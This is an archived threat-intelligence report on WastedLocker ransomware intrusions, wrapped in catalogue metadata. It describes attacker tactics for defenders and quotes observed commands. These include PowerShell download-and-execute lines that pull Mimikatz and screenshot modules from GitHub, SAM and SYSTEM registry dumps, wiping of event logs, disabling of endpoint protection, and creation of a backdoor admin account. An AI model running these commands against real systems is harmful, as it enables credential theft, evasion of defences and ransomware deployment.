{
	"id": "7fb2ea7d-6619-4a71-872f-332e8797caa3",
	"created_at": "2026-04-06T00:20:00.566272Z",
	"updated_at": "2026-04-10T03:19:57.423076Z",
	"deleted_at": null,
	"sha1_hash": "9572fd8cd35ae8e56cc19e9f9576defdba0265c4",
	"title": "WastedLocker Goes \"Big-Game Hunting\" in 2020",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 151887,
	"plain_text": "WastedLocker Goes \"Big-Game Hunting\" in 2020\r\nBy Edmund Brumaghin\r\nPublished: 2020-07-06 · Archived: 2026-04-05 16:17:07 UTC\r\nBy Ben Baker, Edmund Brumaghin, JJ Cummings and Arnaud Zobec.\r\nThreat summary\r\nAfter initially compromising corporate networks, the attacker behind WastedLocker performs privilege\r\nescalation and lateral movement prior to activating ransomware and demanding ransom payment.\r\nThe use of \"dual-use\" tools and \"LoLBins\" enables adversaries to evade detection and stay under the radar\r\nas they further operate towards their objectives in corporate environments.\r\nWastedLocker is one of the latest examples of adversaries' continued use of lateral movement and privilege\r\nescalation to maximize the damage caused by ransomware.\r\nThe use of \"big-game hunting\" continues to cause significant operational and financial damages to\r\norganizations around the globe.\r\nBackground\r\nRansomware is a serious threat to organizations around the world. It is used to\r\ndisrupt operations on computing systems so that attackers can extort victims and\r\ndemand payment, typically in the form of cryptocurrency, to restore normal\r\noperations on infected systems. As the threat actors behind ransomware attacks\r\nhave matured in their capabilities, they have refined their approach to generating\r\nrevenue using this business model. One recent evolution has been the use of\r\nprivilege escalation and lateral movement techniques prior to the activation of\r\nransomware payloads within organizational environments.\r\nBy delivering and activating ransomware on many different systems within corporate networks simultaneously,\r\nattackers can maximize the damage they inflict. This often results in a situation where organizations may be more\r\nlikely to pay a ransom demand than they otherwise would have been, had only a single endpoint been affected. In\r\nsome cases organizational backup and recovery strategies may not have been adequately tested against situations\r\nin which a significant portion of their production environment is adversely affected at the same time, which may\r\ncause them to be more willing to pay a ransom demand. It also allows adversaries to increase the amount of the\r\nransom they are demanding, often resulting in ransom demands for hundreds of thousands of dollars or more to\r\nrecover infected systems. This approach is sometimes referred to as \"big-game hunting.\"\r\nAdversaries have used this approach more frequently over the past year. One of the most recent examples of this is\r\nwith the emergence of a threat actor that is currently leveraging a ransomware family known as \"WastedLocker.\"\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 1 of 9\n\nThe adversary behind these attacks is taking advantage of various \"dual-use\" toolsets like Cobalt Strike,\r\nMimikatz, Empire, and PowerSploit to facilitate lateral movement across environments being targeted. These\r\ntoolsets are typically developed to aid with penetration testing or red-teaming activities, but their use is often co-opted by malicious adversaries as well. Additionally, the use of native operating system functionality, and what are\r\ncommonly referred to as \"LoLBins\" allows attackers to evade detection and operate under the radar until they are\r\nready to activate the ransomware and make their presence known.\r\nTechnical details\r\nMultiple reports have been published recently detailing activity associated with\r\nWastedLocker attacks. The focus of this post will be on dissecting the various\r\nphases of these attacks and describing the tactics, techniques, and procedures that\r\nCisco Talos has observed the threat actor behind WastedLocker using within\r\ntarget environments for the purposes of maximizing their sphere of influence\r\nwithin the network and facilitating the activation of ransomware across the\r\nenvironment.\r\nInitial access and compromise ATT\u0026CK Technique: Drive-By Compromise (T1189)\r\nAs described in previous reporting, the initial compromise appears to be related to fake Google Chrome updates\r\nthat are delivered to victims via drive-by download attacks when victims browse compromised websites. The\r\ninitial malware is delivered to victims in the form of a ZIP archive that contains a malicious JavaScript file. The\r\nmalicious JavaScript is then executed using wscript.exe to initiate the infection process.\r\nC:\\Windows\\System32\\WScript.exe C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\Temp1_Chrome.Update.b343b0.zip\\Chrome.Up\r\nThe threat actor also makes use of Cobalt Strike payloads to perform command execution, process injection,\r\nprivilege escalation, and process impersonation on infected systems. It is also used to dump credentials on the\r\nsystem which may be used to authenticate to other systems on the compromised network to facilitate further\r\nlateral movement activities.\r\nExecution ATT\u0026CK Technique: PowerShell (T1086)\r\nATT\u0026CK Technique: Service Execution (T1035)\r\nPowerShell Execution Policy\r\nThe PowerShell execution policy was set to \"RemoteSigned\" which allows locally created PowerShell\r\nscripts to be executed without requiring them to be signed.\r\npowershell /c Set-ExecutionPolicy RemoteSigned\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 2 of 9\n\nRemote Command Execution\r\nThe PSExec utility established command execution on remote systems within the environment.\r\npsexec -s \\\\\u003cHOSTNAME\u003e|\u003cIP_ADDRESS\u003e cmd\r\nLateral movementATT\u0026CK Technique: Windows Management Instrumentation (T1047)\r\nATT\u0026CK Technique: Windows Admin Shares (T1077)\r\nLateral movement is performed by leveraging the Windows Management Instrumentation (WMI) command line\r\nutility (wmic.exe) to facilitate command execution on remote systems. This functionality is used to download\r\nremotely hosted PowerShell scripts that can be passed to the Invoke-Expression (IEX) cmdlet and executed across\r\nthe network. An example of this activity is below:\r\nC:\\Windows\\System32\\Wbem\\WMIC.exe /node:\u003cIP_ADDRESS\u003e process call create cmd /c powershell -nop -exec bypass -c\r\nThe attacker leverages administrative shares within Windows, specifically the ADMIN$ share, to move data\r\nbetween systems across the compromised network.\r\nCredential dumping ATT\u0026CK Technique: Credential Dumping (T1003)\r\nATT\u0026CK Technique: Credentials In Registry (T1214)\r\nIn most domain environments, Windows credentials can be used to authenticate to various systems across the\r\nnetwork. Malicious attackers often dump cached credentials on systems they successfully compromise so that they\r\ncan be used to remotely authenticate to other systems within the same security boundary or domain. The attacker\r\nbehind WastedLocker has been observed using multiple techniques for retrieving cached credentials on systems\r\nunder their control.\r\nCisco Talos has observed this adversary leveraging Cobalt Strike to dump credentials using Procdump which is\r\npart of the SysInternals Suite from Microsoft.\r\nAdditionally, registry-based credential retrieval is performed by extracting the contents of the following registry\r\nlocations using the \"reg save\" command.\r\nreg save HKLM\\SAM C:\\programdata\\SamBkup.hiv\r\nreg save HKLM\\SYSTEM C:\\programdata\\FileName.hiv\r\nThe adversary was also observed leveraging Mass-Mimikatz, a component of Empire that allows attackers to\r\nexecute Mimikatz on multiple systems over the network. This is performed by using WMI to spawn the creation\r\nof a new PowerShell process. This PowerShell process is used to retrieve the MassMimikatz module from GitHub\r\nand pass it to IEX for execution along with parameters. The parameters are then used to facilitate the retrieval of\r\ncredentials from remote systems.\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 3 of 9\n\nC:\\WINDOWS\\SYSTEM32\\WBEM\\WMIC.exe /node:localhost process call create powershell /c IEX (New-Object\r\nNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/\r\nCOMPUTERNAME2'|Invoke-MassMimikatz -Verbose \u003e c:/programdata/2.txt\r\nPrior reporting has indicated that this adversary is no longer leveraging Empire, however Cisco Talos has observed\r\ncontinued use of components of this toolset in active attacks. While the original Empire project is no longer under\r\nactive development, it has since been forked and development on the new project continues. In this case however,\r\nthe attacker continues to leverage modules retrieved from the original project repositories.\r\nAs previously described the attacker has the capability of leveraging multiple techniques for retrieving credentials\r\nthat may be reused on the network. In many cases this is the most effective and efficient way to move laterally and\r\ncan often result in escalation of privileges within a domain environment if attackers can obtain privileged\r\ncredentials like service accounts or those used for administrative purposes.\r\nDiscovery ATT\u0026CK Technique: Account Discovery (T1087)\r\nATT\u0026CK Technique: Process Discovery (T1057)\r\nATT\u0026CK Technique: Remote System Discovery (T1018)\r\nATT\u0026CK Technique: System Information Discovery (T1082)\r\nAfter successfully compromising the environment, the adversary performed various activities on systems under\r\ntheir control to obtain further information about the system as well as the environment in which the system is\r\nlocated. This post-compromise discovery process allows attackers to identify how the environment is configured\r\nas well as additional targets for lateral movement as they continue to operate towards their longer-term objectives.\r\nIt is important to note that the discovery and enumeration activities observed in this section were all performed via\r\nmanual operator activities conducted on systems, not via scripting or other automated methods. In several cases,\r\nthe attacker attempted to execute command line syntax containing typographical errors, followed immediately by\r\ncorrections to the syntax and subsequent command execution. Some examples of various discovery and\r\nenumeration activities are outlined below.\r\nAccount and Privilege Enumeration\r\nC:\\Windows\\System32\\cmd.exe /C whoami /all \u003e\u003e C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\rad971D8.tmp\r\nC:\\WINDOWS\\system32\\net.exe user \u003cUSERNAME\u003e /domain\r\nC:\\WINDOWS\\system32\\net1 user \u003cUSERNAME\u003e /domain\r\nC:\\WINDOWS\\system32\\cmd.exe /C quser\r\nC:\\WINDOWS\\system32\\quser.exe /server:\u003cIP_ADDRESS\u003e\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 4 of 9\n\nC:\\Windows\\system32\\cmd.exe /C qwinsta\r\nC:\\WINDOWS\\system32\\qwinsta.exe /server:\u003cIP_ADDRESS\u003e\r\nGroup Membership Enumeration\r\nC:\\Windows\\System32\\cmd.exe /C net group domain admins /domain \u003e\u003e C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\rad65F\r\nSystem/Domain Trust Enumeration\r\nC:\\Windows\\system32\\cmd.exe /C nltest /dclist:\u003cDOMAIN|IP_ADDRESS\u003e\r\nLocal System Enumeration\r\nC:\\Windows\\system32\\cmd.exe /C systeminfo | findstr /B /C:OS Name /C:OS Version\r\npowershell.exe (Get-WmiObject -Query 'SELECT Caption FROM Win32_OperatingSystem').Caption\r\nwmic path win32_operatingsystem get caption\r\nLocal Service Enumeration\r\nsc queryex type= service\r\nC:\\Windows\\System32\\cmd.exe /C net start \u003e\u003e C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\rad38FFC.tmp\r\nC:\\Windows\\system32\\net1 start\r\nC:\\Windows\\system32\\cmd.exe /C powershell Get-WmiObject win32_service -ComputerName localhost | Where-Object {$\r\npowershell Get-WmiObject win32_service -ComputerName localhost\r\nNetwork and Shared Folder Enumeration\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 5 of 9\n\nC:\\WINDOWS\\system32\\cmd.exe /C net use\r\nC:\\WINDOWS\\system32\\cmd.exe /C dir \\\\\u003cIP_ADDRESS\u003e\\c$\r\nC:\\Windows\\system32\\cmd.exe /C dir \\\\\u003cHOSTNAME\u003e\\c$\\programdata\r\nC:\\WINDOWS\\system32\\cmd.exe /C ping -n 1 \u003cHOSTNAME\u003e\r\nNetwork Connectivity/Egress Testing\r\nC:\\Windows\\system32\\cmd.exe /C ping -n 1 cofeedback[.]com\r\nDefense Evasion ATT\u0026CK Technique: Indicator Removal on Host (T1070)\r\nATT\u0026CK Technique: Disabling Security Tools (T1089)\r\nATT\u0026CK Technique: Compile After Delivery (T1500)\r\nATT\u0026CK Technique: Trusted Developer Utilities (T1127)\r\nThe attacker leverages the msbuild.exe LoLBin — previously described by Cisco Talos here — to evade endpoint\r\ndetection and execute the Cobalt Strike payloads. The following are examples of msbuild being used to execute\r\nthese payloads.\r\nC:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\msbuild.exe\",\"C:\\\\Programdata\\\\\\\\moveme.csproj\"\r\nC:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\msbuild.exe\",\"C:\\\\Programdata\\\\\\\\m0v3m3.csproj\r\nFollowing operator interaction with systems, the adversary used PsExec to invoke the \"wevtutil.exe\" utility. This\r\nutility cleared the contents of local security event logs on systems. Rather than selectively removing specific log\r\nentries and \"timestomping\" or manipulating the timestamps associated with the logs, the adversary simply cleared\r\nthe entire contents of the log files. In addition to clearing log entries, the adversary was also observed disabling\r\nendpoint security software deployed on systems under their control. Some example of this is below:\r\nClearing Log Entries\r\nPsExec.exe -s \\\\localhost cmd /c for /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1\r\nStopping \u0026 Disabling Endpoint Protection\r\nSeveral attempts were made to disable security protections deployed on endpoint systems, including\r\nSymantec Endpoint Protection, Windows Defender, and Cisco AMP for Endpoints.\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 6 of 9\n\nAttempted to Disable Symantec Endpoint Protection\r\nC:\\WINDOWS\\system32\\cmd.exe /c C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\14.2.5323.2000.105\\\r\nC:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\14.2.5323.2000.105\\Bin\\Smc.exe -disable -sep\r\nAttempting to Disable Cisco AMP for Endpoints\r\nC:\\Windows\\system32\\taskkill.exe /F /IM sfc.exe\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Program Files\\Cisco\\AMP\\7.2.7\\sfc.exe -stop\r\nAttempting to Disable Windows Defender Features\r\nC:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection\r\nThe adversary also frequently leveraged .NET runtime compilation when delivering payloads to additional\r\nsystems within the compromised environment.\r\n.NET Runtime Compilation\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\\Users\\\u003cUSERN\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\r\nPersistence ATT\u0026CK Technique: Account Manipulation (T1098)\r\nA common mechanism used by attackers to achieve a persistent ability to access systems within compromised\r\nenvironments is the creation of backdoor accounts that can be subsequently used by the attacker to access systems\r\nunder their control following initial compromise. We observed the adversary attempting to establish local\r\nadministrative accounts on systems that could be used for this purpose.\r\nC:\\WINDOWS\\system32\\cmd.exe /C net user Admim \u003cPASSWORD\u003e /ADD\r\nC:\\WINDOWS\\system32\\cmd.exe /C net localgroup Administrators Admim /ADD\r\nCollection Activity ATT\u0026CK Technique: Screen Capture (T1113)\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 7 of 9\n\nWMI is also used to execute a PowerShell process on remote systems across the network. The Invoke-Expression\r\n(IEX) cmdlet retrieves the PowerSploit module \"Get-TimedScreenshot\" from its GitHub repository and executes it\r\non the remote system to capture screenshots of the remote system every 30 seconds.\r\nC:\\Windows\\System32\\Wbem\\WMIC.exe /node:\u003cREMOTE_IP\u003e process call create powershell /c IEX (New-Object\r\nSystem.Net.Webclient).DownloadString('https://raw.githubusercontent[.]com/PowerShellMafia/PowerSploit/master/Exf\r\n-Path c:\\programdata\\ -Interval 30\r\nThe collected screenshots are saved under the %PROGRAMDATA% directory on the remote system for later\r\nretrieval.\r\nConclusion\r\nThese tactics, techniques and procedures used by the threat actor behind\r\nWastedLocker demonstrate how these sorts of attacks are taking place across\r\norganizational environments. Organizations should be aware of how attackers are\r\nmoving laterally, escalating privileges, and then using the elevated access to large\r\nportions of the environment to maximize the effectiveness of the ransomware\r\npayloads that they are deploying. It is not always enough to simply deploy\r\nperimeter security, organizations should also ensure that they have layered\r\nsecurity to ensure that they prevent, detect and respond to malicious activity that\r\nmay be conducted within the organization's network following attacks that are\r\nsuccessful at compromising perimeter security defenses. Additionally,\r\norganizations should ensure that their backup and recovery strategies are tested\r\nagainst a variety of different scenarios that may disrupt business operations to\r\nensure that they can recover even in situations where large percentages of systems\r\nor infrastructure are affected at the same time. Adversaries are constantly seeking\r\nto improve upon their strategies for achieving their mission objectives and we will\r\nlikely continue to observe these refinements across the threat landscape.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 8 of 9\n\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), Cisco ISR, and Meraki MX.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase onSnort.org.\r\nSource: https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nhttps://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html"
	],
	"report_names": [
		"wastedlocker-emerges.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434800,
	"ts_updated_at": 1775791197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9572fd8cd35ae8e56cc19e9f9576defdba0265c4.pdf",
		"text": "https://archive.orkl.eu/9572fd8cd35ae8e56cc19e9f9576defdba0265c4.txt",
		"img": "https://archive.orkl.eu/9572fd8cd35ae8e56cc19e9f9576defdba0265c4.jpg"
	}
}